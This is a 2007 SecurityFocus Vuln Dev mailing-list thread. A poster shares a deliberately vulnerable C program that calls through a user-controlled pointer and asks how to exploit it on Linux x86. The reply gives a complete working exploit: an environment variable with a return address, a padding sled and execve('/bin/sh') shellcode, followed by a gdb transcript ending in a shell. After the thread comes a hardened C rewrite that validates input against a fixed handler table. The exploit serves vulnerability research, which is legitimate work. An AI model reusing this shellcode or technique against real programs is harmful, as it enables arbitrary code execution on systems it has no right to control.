Vuln Dev
Exotic vulnerability Jun 26 2007 06:23PM
joxeankoret (joxeankoret yahoo es) (1 reply)
Re: Exotic vulnerability Jun 28 2007 09:24AM
Thomas Pollet (thomas pollet gmail com)
Hello,

On 26/06/07, joxeankoret <joxeankoret (at) yahoo (dot) es> wrote:
>
> Hi,
>
> I'm trying to develop an exploit for a product in which I found a
> vulnerability and that is the most "exotic" one I found. The following C
> source recreates the vulnerability:
>
> #include <stdio.h>
> #include <stdlib.h> /* atoi */
>
> void func(int var)
> {
> /* EAX still holds the integer atoi returned; it is dereferenced as an
>    address and whatever code pointer is found there is called */
> __asm__("mov (%eax), %eax");
> __asm__("call *%eax");
>
> return;
> }
>
>
> int main(int argc, char *argv[])
> {
> int i;
>
> printf("Value is 0x%x\n", atoi(argv[1]));
> i = atoi(argv[1]);
> func(i);
> return 0;
> }
>
> When the process calls the function "func", EAX has the value stored in the
> variable "i"; next the process makes the call "mov (%eax), %eax" and then
> calls %eax. I have not found a way to exploit it.
>
> Any ideas on how it can be exploited to execute arbitrary code? BTW, I'm trying
> to exploit it under Linux x86.
>
> Thanks!
> Joxean Koret

$ export EGG=$(
echo -en "\x9b\xe5\xff\x3f"; # the address that will be called (into nop sled on the stack)
perl -e 'print "A"x4996'; # nops
echo -e "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" # shellcode
)

$ gdb -q ./v
(gdb) break main
Breakpoint 1 at 0x8048383
(gdb) r 1073735062
Starting program: /home/build/v 1073735062

Breakpoint 1, 0x08048383 in main ()
(gdb) x/20x 0x3fffe596
0x3fffe596: 0x3fffe59b 0x41414141 0x41414141 0x41414141
0x3fffe5a6: 0x41414141 0x41414141 0x41414141 0x41414141
0x3fffe5b6: 0x41414141 0x41414141 0x41414141 0x41414141
0x3fffe5c6: 0x41414141 0x41414141 0x41414141 0x41414141
0x3fffe5d6: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) del 1
(gdb) c
Continuing.
Value is 0x3fffe596

Program received signal SIGTRAP, Trace/breakpoint trap.
0x15556a70 in _start () from /lib/ld-linux.so.2
(gdb)
Continuing.
sh-2.05b$

Btw, eax holds the return value of atoi regardless.

Regards,
Thomas Pollet
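The root cause in the thread is that `mov (%eax),%eax; call *%eax` turns a caller-supplied integer into a code pointer, so a known stack address whose contents point at attacker data is all that is needed. As an added example (not code from either poster), this is how the dispatch should be written: the input selects only a bounds-checked index into a read-only table of handlers, and anything else is refused. All names are hypothetical.

```c
/* Hardened replacement for func(): untrusted input never becomes a
 * pointer; it only picks an entry from a fixed, read-only table. */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>

typedef int (*handler_t)(void);

/* hypothetical handlers standing in for the product's real ones */
static int handler_ping(void)   { return 1; }
static int handler_status(void) { return 2; }

/* const table lives in .rodata, so the code pointers cannot be rewritten */
static const handler_t handlers[] = { handler_ping, handler_status };
#define NUM_HANDLERS (sizeof(handlers) / sizeof(handlers[0]))

/* Parse s as a complete, non-negative decimal index inside the table.
 * Returns 0 and stores the index, or -1 on any rejection (empty string,
 * trailing junk, overflow, negative value, out of range). */
int parse_handler_index(const char *s, size_t *out)
{
    char *end;
    if (s == NULL || *s == '\0') return -1;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0') return -1;
    if (v < 0 || (unsigned long)v >= NUM_HANDLERS) return -1;
    *out = (size_t)v;
    return 0;
}

/* Dispatch through the table or refuse. Returns the handler's result,
 * or -1 if the argument was rejected. An address such as 1073735062
 * (0x3fffe596 in the thread) is simply out of range here. */
int dispatch(const char *arg)
{
    size_t idx;
    if (parse_handler_index(arg, &idx) != 0) return -1;
    return handlers[idx]();
}

int main(int argc, char *argv[])
{
    if (argc < 2) { fprintf(stderr, "usage: %s <index>\n", argv[0]); return 2; }
    int r = dispatch(argv[1]);
    if (r < 0) { fprintf(stderr, "rejected: %s\n", argv[1]); return 1; }
    printf("handler returned %d\n", r);
    return 0;
}
```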

Copyright 2010, SecurityFocus